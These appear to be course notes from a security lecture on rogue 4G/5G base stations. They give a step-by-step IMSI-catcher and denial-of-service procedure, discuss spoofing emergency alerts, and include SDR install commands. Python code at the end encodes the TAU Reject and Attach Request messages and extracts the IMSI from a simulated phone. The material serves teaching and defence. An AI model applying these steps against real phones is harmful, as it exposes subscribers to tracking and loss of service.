# 7/31 Critical Infrastructure

:::success
Topic: The impact of rogue base stations on 4G/5G security
>[name=鄭欣明, Associate Professor, Department of Computer Science and Information Engineering, National Taiwan University of Science and Technology]
:::

# [Demo video](https://www.youtube.com/watch?v=EP1PnzMUaCg)

[TOC]

## What is a rogue base station

- Rogue AP
  - Uses a trustworthy-looking name as its SSID
  - Tricks staff into connecting
  - Can read **unencrypted** content directly
  - Phishing, social engineering

<!-- Feels like a bunch of "AIS3-Staff" SSIDs are about to show up -->
<!-- Using a duplicate SSID to trick people into connecting is a pretty common technique, w -->
<!-- Or else the NIC brute-forces the password -->
<!-- Does WPA still need to be cracked? -->
<!-- In theory it all counts as cracking, you just don't have to brute-force -->

## Outline

- Cellular network
- Security issues
- Rogue base station attacks
  - Isolated rogue BS attack
  - Relay attack
  - Overshadowing attack
- Implementation of rogue BS attack
  - Privacy attack
  - Availability attack
  - Spoofing attack
- Demo
- Possible rogue base station attacks in 5G
- Conclusion

## Cellular Network Evolution Tracks

| | 2G | 2.5G | 3G | 3.5G | 4G | 4.5G | 5G |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 3GPP | GSM | GPRS/EDGE | UMTS/WCDMA :arrow_right: HSDPA | HSPA+ | LTE | LTE-A | New Radio (NR) |
| 3GPP2 | IS-95 | null | CDMA EV-DO | :arrow_right: | UMB (withdrawn) | null | null |

<!-- What on earth happened to the table above, w -->
<!-- The mic died a second time, only 15 minutes in :thinking: -->
<!-- The mic has some kind of magic in his hands -->
<!-- He keeps getting muted (laughs) -->

The lecture follows the 3GPP evolution track.

## 5G New Radio

- Network slicing
  - Software-defined architecture
  - Activate different components and functionalities to serve a service with specific QoS requirements

> Virtualization (NFV/SDN)
> A lot is negotiated before any data is transmitted
> Even when idle, the phone exchanges a lot of protocol traffic with the base station

- Circuit switching vs. packet switching
  - Circuit switching: a dedicated line (one per user)
  - Packet switching: everyone shares all the paths
- Different services pass through different nodes in the network
  - e.g. repay debts on the 3rd floor, borrow money on the 5th floor
  - Reduces unnecessary latency
- Every node is virtualized

## 5G-NR NG-RAN gNB

- Function split of gNB-CU and gNB-DU
- Various options
- Introduction of virtualization technology
  - Virtualized inside the router as well

5G: **applying software-defined technology to mobile transmission**

## Security Issues in Cellular Networks

- Mutual authentication
  - The wireless medium is accessible to everyone in the vicinity
  - Identifiers can be easily forged
- User authentication by the network provider
  - Accounting, authorization, and the association of data sessions with a legal person
- Network authentication by the user
  - Network authentication is what makes traffic confidentiality meaningful
  - GSM has no network authentication, so an attacker can simply fake the identity of a legitimate network

> I've been talking for half an hour already, this is really easy to coast through, heh heh heh
> [name=鄭欣明]

> There are very few telcos in the world like Chunghwa Telecom
> It doesn't matter if Chunghwa loses money every year; they have a buffer and just have to stay within it
> [name=鄭欣明]

## Authentication and Key Agreement (AKA) in 4G

![](https://i.imgur.com/uORWY0D.png)

> You don't need to look at these details; I can't be bothered to explain them either
> [name=鄭欣明]

> Showing two IDs (雙證件) is the first step of verification
> The SIM card holds the key
> Simply put, each side computes something to check that the other side really is the one holding the key

## AKA with keys in 4G

> Explanation of the encryption and key-exchange principles; the cryptography experts among you can study it on your own

- After AKA
  - Integrity ...

## Implementation of Rogue Base Station attack

- Software Defined Radio (SDR) with GNU Radio
  - A free software development toolkit
  - Provides signal processing blocks
  - Once a protocol is implemented in software on the hardware, that radio hardware becomes hardware for that protocol
- Low-cost external RF hardware
  - USRP by Ettus Research / NI
- Open-source software
  - 2G: OpenBTS
  - 3G: OpenBTS-UMTS, Osmocom
  - 4G: OAI, srsLTE, NextEPC
  - 5G: free5GC
- Implementation of a rogue base station is possible
  - Very cheap compared with the ....
- Challenges
  - Require both telecom knowledge ...

## Classifications of Attacks

- Isolated Rogue BS Attack
  - The rogue BS cannot connect to the operational core network
  - Leverages the procedures before AKA
  - Leverages the unencrypted messages

> Listen to the parameters of nearby base stations and mimic them, with transmit power turned up to maximum, to trick users into connecting to the fake base station
> The phone automatically selects the nearby base station with the stronger signal
> Communication before the key exchange is unencrypted

```sequence
Victim UE -> Rogue BS: Connected
Victim UE --> Operational BS: Disconnected
Operational BS -> MME/AMF:
```

- Relay and Man-in-the-middle Attack
  - New style of attack
  - Very difficult to implement

Victim UE <---> **Rogue BS** <---> **Malicious UE** <---> Operational BS <---> MME/AMF

## Implementation difficulty of relay

- Overshadow the legitimate signal
- Tightly time-synchronize with the downlink physical channel
- Leverage the synchronization signals
- 3 dB power difference (RBS: 35 dB)

## Isolated rogue base station attacks

- Against privacy
  - Retrieve the IMSI (International Mobile Subscriber Identity) of UE/IoT devices
  - Unique ID stored in the SIM card
- Against availability
  - DoS (Denial of Service) of a particular IMSI
- Against authentication
  - Spoofing of broadcast system information

## Procedures

- TAU (Tracking Area Update) system/MME ...
- Attach procedure (?)

> We think buying a Huawei ~~(the whole company)~~ unit just for testing is a waste of money
> [name=鄭欣明]

## Spoofing wireless emergency alerts attack

- Via LTE Commercial Mobile Alert Service
- Japan: ...
- Presidential alerts
  - From the president to all of the United States
- ...

## Spoofing WEA Attack

> Forged national-level alert
> (picture of a fake Wuhan pneumonia alert)
> You can't tell it's fake
> Basically an attack on the unencrypted signalling

## AKA in 5G

> Basically encrypts some of the signalling that 4G left unencrypted, but which parts need encryption and which don't is still under discussion; this removes many of the attacks above
> Private key

## Discussion

- Digitally signing broadcast messages
- Each operational BS has ...
- ...

## Conclusion

- Rogue base station attacks are feasible for academic researchers and, of course, for an adversary
  - Cheap
  - Easy to deploy
  - Portable
- Detection and prevention of the attack are necessary
  - Modification of the protocols
- The 5G protocol is similar to 4G
  - Lots of vulnerabilities exist

## Hands-on

- Live demo
- Live install

### 4G/LTE Architecture

> Someone who knows this well, please add the figure
> S1-U: goes straight through, so it's faster (eNodeB <-> SGW)
> ![](https://i.imgur.com/fQhCW6c.png)
> ![](https://i.imgur.com/hf3bub3.png)

<!-- I'll just redraw it --><!-- 666 -->

## Isolated Rogue BS Attacks

- The rogue BS cannot connect to the operational core network
- Leverages the procedures before AKA
- Leverages the unencrypted messages

> Seems this is already above
> Consider it review, everyone
> ?!
> Weren't listening in class lol
> [#Classifications-of-Attacks](#Classifications-of-Attacks)
> As long as the signalling matches the spec, the phone will accept it
> See the public [specification](https://www.etsi.org/deliver/etsi_ts/136300_136399/136331/15.03.00_60/ts_136331v150300p.pdf) for details

- Standards
  - ETWS: Japanese standard
  - CMAS: US standard (Taiwan uses the US standard)

## IMSI Capturer and DoS Attack

![](https://i.imgur.com/WbV1Um0.png)

- Step 1: Mimic neighboring operational BSs
  - Collect the information broadcast by neighboring legitimate BSs
    - MCC (Mobile Country Code)
    - MNC (Mobile Network Code)
      - 01, 92 (Chunghwa), 97
    - TAC (Tracking Area Code)
    > With these three values you can look up which base station you are currently connected to
  - Use stronger transmission power
    - Ensures that the victim can receive the rogue BS
- Step 2: Trigger the UE to perform the TAU procedure using its GUTI
  - Change the TAC of the rogue base station
  - The victim will believe it has entered a new TA and perform the TAU procedure
- Step 3: Feed back a TAU Reject
  - EMM Cause #9: UE identity cannot be derived by the network
  - The UE deletes its visited TA list and GUTI and enters the "EMM-DEREGISTERED" state
- Step 4: The UE performs the Attach procedure using its IMSI
- Step 5: ...

https://hackmd.io/@jed/ais3_srslte

[HD Demo](https://www.youtube.com/watch?v=EP1PnzMUaCg)

<!-- Switching battlefields -->
<!-- Empty? Yep -->

## Hands-on: srsLTE

> https://github.com/srsLTE/srsLTE
> Use an Ubuntu environment
> USRP board (USD); do NOT clone, there are packaged binaries
> Can't install without the board
> Recommended: use the Chunghwa, FarEasTone and Taiwan Mobile band (band 3); the other two carriers only use band 7, which our "Hakka" (budget) antenna doesn't support

```bash
sudo add-apt-repository ppa:ettusresearch/uhd
sudo apt-get update
sudo apt-get install libuhd-dev libuhd003 uhd-host
```

<!-- Ubuntu 20.04? -->
<!-- BTW, no idea why, but the official arch repo has a binary of this -->
<!-- Anyone else on arch? <3 -->
<!-- Just checked, folks on Ubuntu 19.10+ can also install it directly -->
<!-- The code from the code repository of the world's largest online dating platform for programmers -->
<!-- Is this class only for the Critical Infrastructure track? I came to AIS3 wanting to actually attend classes properly QQ -->
<!-- If so, please give us more equipment :silly: -->
<!-- You can come over and demo together -->
<!-- One board costs over 40,000, so we can't buy many; that's why Critical Infrastructure gets more. You can come over to those seats and play once the install is done -->
<!-- No problem, I'm just used to installing and playing on my own; squeezing in with others is a bit uncomfortable :silly: -->
<!-- I'll buy an SDR to play with myself once I have the money -->
<!-- Only just now noticed the "Hakka antenna" lol -->
<!-- The purple box is the terminal! -->
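The five steps of the IMSI capturer above all ride on plain (pre-AKA, unprotected) NAS messages, so they can be reproduced byte for byte from the public specs. The following is an added example, not code from the lecture, srsLTE or any other project: it encodes the rogue eNB's TAU Reject with EMM cause #9 and the victim's subsequent Attach Request per 3GPP TS 24.301 and TS 24.008 10.5.1.4, decodes the EPS mobile identity out of the attach, and encodes the PLMN identity (MCC/MNC) that Step 1 copies from the neighbouring cell. The IMSI, GUTI and PLMN values are constructed for the example; `SimUE` is a hypothetical stand-in for the UE's EMM state machine, and the two-digit-MNC split in `imsi_plmn` is an assumption that holds for Taiwanese PLMNs (MCC 466) but not for every operator.

```python
"""Plain NAS EMM messages behind the TAU-Reject IMSI catcher (3GPP TS 24.301 / TS 24.008).

Added example; all identities below are constructed and belong to no real subscriber.
"""

EMM_PD = 0x07                   # protocol discriminator EMM, security header type 0 (plain NAS)
MT_ATTACH_REQUEST = 0x41
MT_TAU_REJECT = 0x4B
CAUSE_UE_ID_NOT_DERIVED = 0x09  # EMM cause #9: "UE identity cannot be derived by the network"
ID_TYPE_IMSI = 0b001            # TS 24.008 10.5.1.4 type-of-identity values
ID_TYPE_GUTI = 0b110


def build_tau_reject(cause: int = CAUSE_UE_ID_NOT_DERIVED) -> bytes:
    """TAU Reject = PD/security header | message type | EMM cause (TS 24.301 8.2.28)."""
    return bytes([EMM_PD, MT_TAU_REJECT, cause])


def encode_plmn(mcc: str, mnc: str) -> bytes:
    """PLMN identity (TS 24.008 10.5.1.3): MCC2|MCC1, MNC3|MCC3, MNC2|MNC1; 2-digit MNC pads MNC3 with 0xF."""
    m = [int(c) for c in mcc]
    n = [int(c) for c in mnc] + ([0xF] if len(mnc) == 2 else [])
    return bytes([(m[1] << 4) | m[0], (n[2] << 4) | m[2], (n[1] << 4) | n[0]])


def encode_imsi(imsi: str) -> bytes:
    """Mobile Identity IE value for an IMSI: digit 1 | odd/even bit | type, then BCD pairs low nibble first."""
    digits = [int(c) for c in imsi]
    odd = len(digits) % 2
    first = (digits[0] << 4) | (odd << 3) | ID_TYPE_IMSI
    rest = digits[1:] + ([0xF] if not odd else [])  # even digit count: filler in the last upper nibble
    return bytes([first] + [(hi << 4) | lo for lo, hi in zip(rest[0::2], rest[1::2])])


def decode_mobile_identity(value: bytes) -> tuple:
    """Return ("IMSI", digits) or ("GUTI", hex) for a Mobile Identity IE value."""
    id_type, odd = value[0] & 0x07, (value[0] >> 3) & 1
    if id_type == ID_TYPE_GUTI:
        return "GUTI", value[1:].hex()  # temporary identity: reveals nothing about the subscriber
    if id_type != ID_TYPE_IMSI:
        raise ValueError(f"unsupported identity type {id_type}")
    digits = [value[0] >> 4]
    for b in value[1:]:
        digits += [b & 0x0F, b >> 4]
    if not odd:
        digits.pop()  # drop the 0xF filler
    return "IMSI", "".join(str(d) for d in digits)


def build_attach_request(identity: bytes) -> bytes:
    """Attach Request (TS 24.301 8.2.4) with the mandatory IEs: attach type/KSI, identity, UE capability, ESM container."""
    head = bytes([EMM_PD, MT_ATTACH_REQUEST, 0x71])  # KSI 7 (no key available) | EPS attach
    ue_cap = bytes([0x02, 0xE0, 0xE0])               # LV: EEA0-2 / EIA1-2 supported (constructed)
    # LV-E ESM container: PDN CONNECTIVITY REQUEST (PD ESM, PTI 1, type 0xD0, IPv4 + initial request)
    esm = bytes([0x00, 0x04, 0x02, 0x01, 0xD0, 0x11])
    return head + bytes([len(identity)]) + identity + ue_cap + esm


def parse_attach_request(msg: bytes) -> dict:
    """What a passive sniffer or the rogue eNB itself sees in an unprotected Attach Request."""
    if msg[:2] != bytes([EMM_PD, MT_ATTACH_REQUEST]):
        raise ValueError("not a plain Attach Request")
    ident = msg[4:4 + msg[3]]
    kind, value = decode_mobile_identity(ident)
    return {"attach_type": msg[2] & 0x0F, "nas_ksi": msg[2] >> 4, "identity_type": kind, "identity": value}


def imsi_plmn(imsi: str, mnc_len: int = 2) -> tuple:
    """Split an IMSI into MCC, MNC, MSIN. Assumes a 2-digit MNC (true for MCC 466); needs a table in general."""
    return imsi[:3], imsi[3:3 + mnc_len], imsi[3 + mnc_len:]


class SimUE:
    """Hypothetical stand-in for the victim's EMM state machine (only the cause #9 path is modelled)."""

    def __init__(self, imsi: str, guti: bytes):
        self.imsi, self.guti, self.state = imsi, guti, "EMM-REGISTERED"

    def on_tau_reject(self, msg: bytes) -> bytes:
        if msg[:2] != bytes([EMM_PD, MT_TAU_REJECT]):
            raise ValueError("not a TAU Reject")
        if msg[2] != CAUSE_UE_ID_NOT_DERIVED:
            return b""
        # TS 24.301 5.5.3.2.5: delete GUTI, TAI list and KSI, enter EMM-DEREGISTERED, then re-attach.
        # With no GUTI left, the only identity the UE can attach with is its IMSI.
        self.guti, self.state = None, "EMM-DEREGISTERED"
        return build_attach_request(encode_imsi(self.imsi))


def run_catcher_flow() -> dict:
    """Steps 2-4 of the lecture: GUTI before the reject, IMSI in the clear after it."""
    plmn = encode_plmn("466", "92")                                   # Step 1: copied from the real cell
    guti = bytes([0xF6]) + plmn + bytes.fromhex("0001" "02" "c0000001")  # type GUTI, even, constructed
    ue = SimUE("466920123456789", guti)
    before = decode_mobile_identity(ue.guti)[0]                       # what a TAU Request would expose
    attach = ue.on_tau_reject(build_tau_reject())                     # Step 3 -> Step 4
    seen = parse_attach_request(attach)
    mcc, mnc, msin = imsi_plmn(seen["identity"])
    return {"before": before, "after": seen["identity_type"], "imsi": seen["identity"],
            "state": ue.state, "mcc": mcc, "mnc": mnc, "plmn_hex": plmn.hex()}


if __name__ == "__main__":
    print(run_catcher_flow())
```

Everything here is pre-AKA, so the UE has no NAS security context with which to check the integrity of the TAU Reject; that is exactly the "leverage the procedures before AKA / the unencrypted messages" point of the isolated rogue BS attack, and it is also why the same bytes work against any 4G UE regardless of operator. 5G removes Step 4's payoff by sending a concealed SUPI (SUCI) instead of a plain IMSI, which is the kind of signalling protection the AKA-in-5G section above refers to.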